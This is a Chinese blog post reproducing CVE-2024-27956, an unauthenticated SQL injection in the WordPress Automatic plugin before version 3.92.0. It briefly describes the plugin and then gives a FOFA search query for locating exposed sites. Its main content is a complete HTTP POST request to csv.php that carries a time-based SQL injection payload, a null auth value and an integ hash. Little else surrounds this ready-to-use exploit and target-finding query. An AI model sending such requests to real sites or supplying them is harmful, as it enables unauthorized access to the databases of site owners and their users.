热门标签
热门文章
- 1QSFP28和QSFP+光模块能兼容吗
- 2C语言学习笔记——自定义数据类型_c语言如何自己创建一个数据类型
- 340网桥的基本概念及其原理_网桥的概念和基本原理
- 406.2_c/c++开源库boost_coroutine2 协程库
- 52023年全国职业院校技能大赛应用软件系统开发赛项(高职组)赛题第8套_2023年全国职业院校技能大赛软件系统开发
- 6Flutter - 折叠面板
- 7UNet++ 理解
- 8决策树和随机森林对经典鸢尾花数据集分类_使用决策树和随机森林对鸢尾花数据集进行分类
- 9Three.js--》实现3d字体模型展示_three 做3d立体字
- 10无线局域网安全(二)————TKIP加密_tkip加密机制
当前位置: article > 正文
【漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)
作者:2023面试高手 | 2024-05-15 13:30:04
赞
踩
【漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)
0x01 产品简介
WordPress Automatic Plugin是一款功能强大的WordPress插件,旨在帮助用户自动采集并发布内容。这款插件支持从各种来源自动采集内容,包括但不限于RSS源、网站、YouTube、eBay等。用户可以根据自己的需求设置采集规则,选择要采集的内容类型、关键词、发布时间等。一旦设置完成,插件会自动按照规则定时采集内容,并发布到WordPress网站上。
0x02 漏洞概述
WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0x03 测绘语句
fofa: body="/wp-content/plugins/wp-automatic"0x04 漏洞复现
漏洞复现:
- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
-
- Host:
-
- Content-Type: application/x-www-form-urlencoded
-
-
-
- q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/573064
推荐阅读
相关标签
